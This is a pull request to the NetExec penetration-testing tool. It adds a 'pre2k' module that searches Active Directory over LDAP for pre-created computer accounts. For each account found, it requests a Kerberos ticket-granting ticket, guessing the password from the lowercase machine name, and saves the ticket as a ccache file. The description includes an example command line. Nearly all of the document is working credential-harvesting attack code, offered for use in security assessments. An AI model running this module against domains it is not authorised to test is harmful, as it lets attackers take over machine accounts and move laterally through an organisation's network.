### PR TITLE
Identify Pre-Created Computer Accounts

### DIFF
--- a/nxc/modules/pre2k.py
+++ b/nxc/modules/pre2k.py
@@ -1,0 +1,151 @@
+import os
+from impacket.ldap import ldap, ldapasn1
+from impacket.krb5.kerberosv5 import getKerberosTGT
+from impacket.krb5.ccache import CCache
+from impacket.krb5.types import Principal
+from impacket.krb5 import constants
+from binascii import unhexlify
+
+class NXCModule:
+    """
+    Identify pre-created computer accounts, save the results to a file, and obtain TGTs for each pre-created computer account.
+    Module by : @shad0wcntr0ller
+    
+    """
+    name = 'pre2k'
+    description = 'Identify pre-created computer accounts, save the results to a file, and obtain TGTs for each'
+    supported_protocols = ['ldap']
+    opsec_safe = True
+    multiple_hosts = False
+
+    def options(self, context, module_options):
+        pass
+
+    def on_login(self, context, connection):
+        try:
+            # Initialize connection to LDAP
+            context.log.info(f"Connecting to LDAP server at ldap://{connection.host}")
+
+            if connection.kerberos:
+                ldap_connection = ldap.LDAPConnection(f'ldap://{connection.host}', connection.baseDN, None)
+                ldap_connection.kerberosLogin(connection.username, connection.password, connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, aesKey=connection.aesKey, kdcHost=connection.kdcHost)
+            else:
+                ldap_connection = ldap.LDAPConnection(f'ldap://{connection.host}', connection.baseDN, None)
+                ldap_connection.login(connection.username, connection.password, connection.domain, lmhash=connection.lmhash, nthash=connection.nthash)
+
+            # Define the search filter for pre-created computer accounts
+            search_filter = '(&(objectClass=computer)(userAccountControl=4128))'
+            attributes = ['sAMAccountName', 'userAccountControl', 'dNSHostName']
+
+            context.log.info(f'Using search filter: {search_filter}')
+            context.log.info(f'Attributes to retrieve: {attributes}')
+
+            computers = []
+
+            try:
+                # Use paged search to retrieve all computer accounts with specific flags
+                paged_search_control = ldapasn1.SimplePagedResultsControl(criticality=True, size=1000)
+                search_results = ldap_connection.search(searchFilter=search_filter, attributes=attributes, searchControls=[paged_search_control])
+
+                for item in search_results:
+                    if isinstance(item, ldapasn1.SearchResultEntry):
+                        context.log.debug(f'Raw item: {item.prettyPrint()}')
+
+                        sam_account_name = None
+                        user_account_control = None
+
+                        for attribute in item['attributes']:
+                            context.log.debug(f'Attribute: {attribute.prettyPrint()}')
+                            if str(attribute['type']) == 'sAMAccountName':
+                                sam_account_name = str(attribute['vals'][0])
+                            elif str(attribute['type']) == 'userAccountControl':
+                                user_account_control = str(attribute['vals'][0])
+
+                        context.log.debug(f"Processing computer: {sam_account_name}, UAC: {user_account_control}")
+
+                        if sam_account_name and user_account_control is not None:
+                            user_account_control = int(user_account_control)
+
+                            # Check if the account is a pre-created computer account
+                            if user_account_control == 4128:  # 4096 | 32
+                                computers.append(sam_account_name)
+                                context.log.debug(f'Added computer: {sam_account_name}')
+
+                # Save computers to file
+                base_dir = '/root/.nxc/DiscoveredComputers'
+                domain_dir = os.path.join(base_dir, connection.domain)
+                output_file = os.path.join(domain_dir, 'precreated_computers.txt')
+
+                # Create directories if they do not exist
+                os.makedirs(domain_dir, exist_ok=True)
+
+                with open(output_file, 'w') as file:
+                    for computer in computers:
+                        file.write(f'{computer}\n')
+
+                # Print discovered pre-created computer accounts
+                if computers:
+                    for computer in computers:
+                        context.log.highlight(f'Pre-created computer account: {computer}')
+                    context.log.success(f'Found {len(computers)} pre-created computer accounts. Saved to {output_file}')
+                else:
+                    context.log.info(f'No pre-created computer accounts found.')
+
+                # Obtain TGTs and save to ccache
+                ccache_base_dir = '/root/.nxc/ccache'
+                os.makedirs(ccache_base_dir, exist_ok=True)
+
+                successful_tgts = 0
+
+                for computer in computers:
+                    machine_name = computer[:-1].lower()  # Remove trailing '$' and convert to lowercase
+                    if self.get_tgt(context, machine_name, connection.domain, connection.kdcHost, ccache_base_dir):
+                        successful_tgts += 1
+
+                # Summary of TGT results
+                context.log.success(f'Successfully obtained TGT for {successful_tgts} pre-created computer accounts. Saved to {ccache_base_dir}')
+
+            except Exception as e:
+                context.log.fail(f'Error occurred during search: {e}')
+
+            ldap_connection.close()
+            return True
+
+        except Exception as e:
+            context.log.fail(f'Error occurred during LDAP connection: {e}')
+            return False
+
+    def get_tgt(self, context, username, domain, kdcHost, ccache_base_dir):
+        try:
+            userName = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+            password = username  # Password is the machine name in lowercase
+            context.log.info(f"Getting TGT for {username}@{domain}")
+
+            tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(
+                clientName=userName,
+                password=password,
+                domain=domain,
+                lmhash='',
+                nthash='',
+                aesKey='',
+                kdcHost=kdcHost,
+                serverName=None
+            )
+
+            self.save_ticket(context, username, tgt, oldSessionKey, ccache_base_dir)
+            context.log.success(f'Successfully obtained TGT for {username}@{domain}')
+            return True
+        except Exception as e:
+            context.log.fail(f'Failed to get TGT for {username}@{domain}: {e}')
+            return False
+
+    def save_ticket(self, context, username, ticket, sessionKey, ccache_base_dir):
+        try:
+            ccache = CCache()
+            ccache.fromTGT(ticket, sessionKey, sessionKey)
+            ccache_filename = os.path.join(ccache_base_dir, f'{username}.ccache')
+            ccache.saveFile(ccache_filename)
+            context.log.info(f'Saved ticket in {ccache_filename}')
+        except Exception as e:
+            context.log.fail(f'Failed to save ticket for {username}: {e}')
+

--- a/nxc/modules/pre2k.py
+++ b/nxc/modules/pre2k.py
@@ -4,7 +4,6 @@ from impacket.krb5.kerberosv5 import getKerberosTGT
 from impacket.krb5.ccache import CCache
 from impacket.krb5.types import Principal
 from impacket.krb5 import constants
-from binascii import unhexlify
 
 class NXCModule:
     """
@@ -12,9 +11,9 @@ class NXCModule:
     Module by : @shad0wcntr0ller
     
     """
-    name = 'pre2k'
-    description = 'Identify pre-created computer accounts, save the results to a file, and obtain TGTs for each'
-    supported_protocols = ['ldap']
+    name = "pre2k"
+    description = "Identify pre-created computer accounts, save the results to a file, and obtain TGTs for each"
+    supported_protocols = ["ldap"]
     opsec_safe = True
     multiple_hosts = False
 
@@ -27,18 +26,18 @@ class NXCModule:
             context.log.info(f"Connecting to LDAP server at ldap://{connection.host}")
 
             if connection.kerberos:
-                ldap_connection = ldap.LDAPConnection(f'ldap://{connection.host}', connection.baseDN, None)
+                ldap_connection = ldap.LDAPConnection(f"ldap://{connection.host}", connection.baseDN, None)
                 ldap_connection.kerberosLogin(connection.username, connection.password, connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, aesKey=connection.aesKey, kdcHost=connection.kdcHost)
             else:
-                ldap_connection = ldap.LDAPConnection(f'ldap://{connection.host}', connection.baseDN, None)
+                ldap_connection = ldap.LDAPConnection(f"ldap://{connection.host}", connection.baseDN, None)
                 ldap_connection.login(connection.username, connection.password, connection.domain, lmhash=connection.lmhash, nthash=connection.nthash)
 
             # Define the search filter for pre-created computer accounts
-            search_filter = '(&(objectClass=computer)(userAccountControl=4128))'
-            attributes = ['sAMAccountName', 'userAccountControl', 'dNSHostName']
+            search_filter = "(&(objectClass=computer)(userAccountControl=4128))"
+            attributes = ["sAMAccountName", "userAccountControl", "dNSHostName"]
 
-            context.log.info(f'Using search filter: {search_filter}')
-            context.log.info(f'Attributes to retrieve: {attributes}')
+            context.log.info(f"Using search filter: {search_filter}")
+            context.log.info(f"Attributes to retrieve: {attributes}")
 
             computers = []
 
@@ -49,17 +48,17 @@ class NXCModule:
 
                 for item in search_results:
                     if isinstance(item, ldapasn1.SearchResultEntry):
-                        context.log.debug(f'Raw item: {item.prettyPrint()}')
+                        context.log.debug(f"Raw item: {item.prettyPrint()}")
 
                         sam_account_name = None
                         user_account_control = None
 
-                        for attribute in item['attributes']:
-                            context.log.debug(f'Attribute: {attribute.prettyPrint()}')
-                            if str(attribute['type']) == 'sAMAccountName':
-                                sam_account_name = str(attribute['vals'][0])
-                            elif str(attribute['type']) == 'userAccountControl':
-                                user_account_control = str(attribute['vals'][0])
+                        for attribute in item["attributes"]:
+                            context.log.debug(f"Attribute: {attribute.prettyPrint()}")
+                            if str(attribute["type"]) == "sAMAccountName":
+                                sam_account_name = str(attribute["vals"][0])
+                            elif str(attribute["type"]) == "userAccountControl":
+                                user_account_control = str(attribute["vals"][0])
 
                         context.log.debug(f"Processing computer: {sam_account_name}, UAC: {user_account_control}")
 
@@ -69,30 +68,30 @@ class NXCModule:
                             # Check if the account is a pre-created computer account
                             if user_account_control == 4128:  # 4096 | 32
                                 computers.append(sam_account_name)
-                                context.log.debug(f'Added computer: {sam_account_name}')
+                                context.log.debug(f"Added computer: {sam_account_name}")
 
                 # Save computers to file
-                base_dir = '/root/.nxc/DiscoveredComputers'
+                base_dir = "/root/.nxc/DiscoveredComputers"
                 domain_dir = os.path.join(base_dir, connection.domain)
-                output_file = os.path.join(domain_dir, 'precreated_computers.txt')
+                output_file = os.path.join(domain_dir, "precreated_computers.txt")
 
                 # Create directories if they do not exist
                 os.makedirs(domain_dir, exist_ok=True)
 
-                with open(output_file, 'w') as file:
+                with open(output_file, "w") as file:
                     for computer in computers:
-                        file.write(f'{computer}\n')
+                        file.write(f"{computer}\n")
 
                 # Print discovered pre-created computer accounts
                 if computers:
                     for computer in computers:
-                        context.log.highlight(f'Pre-created computer account: {computer}')
-                    context.log.success(f'Found {len(computers)} pre-created computer accounts. Saved to {output_file}')
+                        context.log.highlight(f"Pre-created computer account: {computer}")
+                    context.log.success(f"Found {len(computers)} pre-created computer accounts. Saved to {output_file}")
                 else:
-                    context.log.info(f'No pre-created computer accounts found.')
+                    context.log.info("No pre-created computer accounts found.")
 
                 # Obtain TGTs and save to ccache
-                ccache_base_dir = '/root/.nxc/ccache'
+                ccache_base_dir = "/root/.nxc/ccache"
                 os.makedirs(ccache_base_dir, exist_ok=True)
 
                 successful_tgts = 0
@@ -103,16 +102,16 @@ class NXCModule:
                         successful_tgts += 1
 
                 # Summary of TGT results
-                context.log.success(f'Successfully obtained TGT for {successful_tgts} pre-created computer accounts. Saved to {ccache_base_dir}')
+                context.log.success(f"Successfully obtained TGT for {successful_tgts} pre-created computer accounts. Saved to {ccache_base_dir}")
 
             except Exception as e:
-                context.log.fail(f'Error occurred during search: {e}')
+                context.log.fail(f"Error occurred during search: {e}")
 
             ldap_connection.close()
             return True
 
         except Exception as e:
-            context.log.fail(f'Error occurred during LDAP connection: {e}')
+            context.log.fail(f"Error occurred during LDAP connection: {e}")
             return False
 
     def get_tgt(self, context, username, domain, kdcHost, ccache_base_dir):
@@ -125,27 +124,27 @@ class NXCModule:
                 clientName=userName,
                 password=password,
                 domain=domain,
-                lmhash='',
-                nthash='',
-                aesKey='',
+                lmhash="",
+                nthash="",
+                aesKey="",
                 kdcHost=kdcHost,
                 serverName=None
             )
 
             self.save_ticket(context, username, tgt, oldSessionKey, ccache_base_dir)
-            context.log.success(f'Successfully obtained TGT for {username}@{domain}')
+            context.log.success(f"Successfully obtained TGT for {username}@{domain}")
             return True
         except Exception as e:
-            context.log.fail(f'Failed to get TGT for {username}@{domain}: {e}')
+            context.log.fail(f"Failed to get TGT for {username}@{domain}: {e}")
             return False
 
     def save_ticket(self, context, username, ticket, sessionKey, ccache_base_dir):
         try:
             ccache = CCache()
             ccache.fromTGT(ticket, sessionKey, sessionKey)
-            ccache_filename = os.path.join(ccache_base_dir, f'{username}.ccache')
+            ccache_filename = os.path.join(ccache_base_dir, f"{username}.ccache")
             ccache.saveFile(ccache_filename)
-            context.log.info(f'Saved ticket in {ccache_filename}')
+            context.log.info(f"Saved ticket in {ccache_filename}")
         except Exception as e:
-            context.log.fail(f'Failed to save ticket for {username}: {e}')
+            context.log.fail(f"Failed to save ticket for {username}: {e}")
 


### PR DESCRIPTION
Added the ability to identify Pre-Created Computer Accounts, and attempt to save a ccache for each account. This way we do not need to reset the password. 

nxc ldap 192.168.199.210 -u nxcuser -p 'notadmin123!' -M pre2k

![image](https://github.com/Pennyw0rth/NetExec/assets/90877534/51a3a9a6-b1b8-4e25-8408-8473b45f1d17)

Reference - https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
